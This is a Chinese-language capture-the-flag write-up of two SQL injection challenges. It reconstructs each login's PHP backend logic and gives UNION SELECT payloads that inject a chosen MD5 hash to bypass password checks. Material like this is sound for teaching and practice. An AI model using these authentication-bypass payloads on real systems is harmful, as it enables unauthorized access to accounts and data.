[GXYCTF2019]BabySQli
后端判断语句猜测
<?php
$row;
$pass=$_POST['pw'];
if($row['username']==’admin’)
{
if($row['password']==md5($pass))
{
echo $flag;
}
else{
echo “wrong pass!”;
}
}else{ echo “wrong user!”;}
payload:
'union select 1,’admin’,’202cb962ac59075b964b07152d234b70′#
pass输入123’
[Jarvis-OJ-Web]Simple Injection
简单测试下,发现有密码错误和用户名错误两种错误回显。两道题的相同之处在此
页面存在两种报错返回结果,用户名错误和密码错误,而且输入除admin外的用户名均提示用户名错误,所以可以肯定admin一个用户,
进而猜测它的处理逻辑可能为:通过输入的username作为where条件查询密码,如果存在且查询结果与输入的密码相同即爆flag,如果不匹配则返回密码错误,而如果不存在查询结果就报用户名错误。逻辑代码类似于下面:
$res = query(select password from user where username=$_POST['username']);//query函数为了简便瞎写了
if($res) //查询返回结果不为空集
{
if(fetch($res)===md5($_POST['password'])){ //fetch函数为图简便,也是瞎写的。
echo $flag;
}
else{ //密码不匹配
echo "密码错误";
}
}
else{
echo "用户名错误";
}
于是我们可以输入一个不存在的用户名,结合union select语句手动创建一个密码作为sql查询语句的返回结果,然后密码框处输入我们创建的假密码进行绕过。
例如输入username=miracle778’//union(select(123))#&password=123,结果返回密码错误没有报用户名错误,这说明了我们这个方法是生效的,只是服务器做密码比较的时候可能用了哈希加密,这里推测用了md5加密。于是输入username=miracle778’//union(select(md5(‘123’)))#&password=123,成功得到flag